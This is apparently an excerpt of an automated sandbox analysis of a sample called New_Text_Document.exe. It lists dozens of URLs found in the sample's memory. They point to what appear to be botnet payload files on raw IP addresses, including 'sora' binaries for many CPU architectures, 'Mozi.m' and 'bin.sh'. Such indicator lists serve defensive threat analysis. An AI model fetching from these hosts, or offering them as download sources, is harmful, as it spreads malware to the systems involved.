                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.i686
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.152.176.20:39327/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.179.159:42060/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.180.9.57:12220/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.181.0.146:57293/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.181.0.20:63219/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.181.0.61:64572/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.181.31.183:54581/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.181.78.243:43455/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.187.36.184:39442/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.196.195.65:45663/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.202.11.68:48386/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.217.202.138:30424/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.225.20.46:40746/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.238.145.148:14998/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.238.148.239:63234/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.238.73.213:18976/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.36.68.156:54788/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.38.120.175:47449/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.38.38.4:31489/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.47.105.66:41348/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.55.70.234:22884/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.83.84.101:20705/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.84.58.236:54230/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.97.88.50:31687/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.114.187.139:37161/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.161.80.42:21699/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.170.234.190/x/1sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.170.234.190/x/3sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.31.19.179:6801/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.58.88.93:55353/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.58.93.91:49383/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.58.93.91:49383/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.107.239:57881/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.107.239:57881/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.107.239:57881/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.114.69:45994/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.114.69:45994/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.6.167.101:43000/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.6.91.44:60841/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.6.91.44:60841/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.69.62.250:59844/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.69.62.250:59844/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.81.127.208:42014/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.87.231.19:15787/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.91.207.83:29687/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.103.28.115:10199/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.143.148.126:62327/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.143.42.33:32428/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.172.117:33127/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.172.127:34379/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.173.84:53974/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.175.179:41997/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.175.179:41997/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.179.211:37619/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.182.32:35814/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.182.49:51913/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.150.183.227:53474/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.170.75.38:11483/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.184.82.171:44379/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.122.114:41675/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.109.138:59908/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.109.138:59908/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.109.75:43566/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.109.75:43566/i
